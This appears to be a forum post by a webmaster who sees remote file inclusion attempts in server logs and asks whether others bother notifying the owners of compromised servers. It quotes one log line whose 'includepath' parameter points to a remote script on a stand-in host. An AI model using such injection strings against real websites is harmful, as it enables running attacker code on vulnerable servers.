Usually it is something like this:

123.45.678.9 - - [17/Feb/2009:02:08:21 +0100] "GET /index.php/?includepath=http://www.example.com/malicious_script.txt HTTP/1.1" 404 2608 "-" "libwww-perl/5.805"

This means there are two compromised webservers involved. One doing the request and one hosting the malicious script.

I usually don't bother with webservers in Russia or Nigeria or China but recently I have begun to inform webmasters in other countries of the compromised servers. However the feedback I receive is quite disillusioning.

Either the webmaster

- has no clue of what I am talking about.
- claims that his website is secure and I must be mistaken.
- tells me the website belongs to a client and he is not responsible.
- tells me they have fixed the security hole, but when I check my logfiles the next days I find the same entries again.
- doesn't respond or react to my email at all.

What do you do in such cases? Do you even notify other webmasters about security issues on their webservers? Or simply block the IP and forget about it?

I have also found that sending emails to the email address indicated for security issues when I look up the IPs or domain names seldom triggers a response. This is usually something like abuse@example.com. It seems that many webmasters don't even have set up this email address or it leads to an email account that is checked perhaps every two years.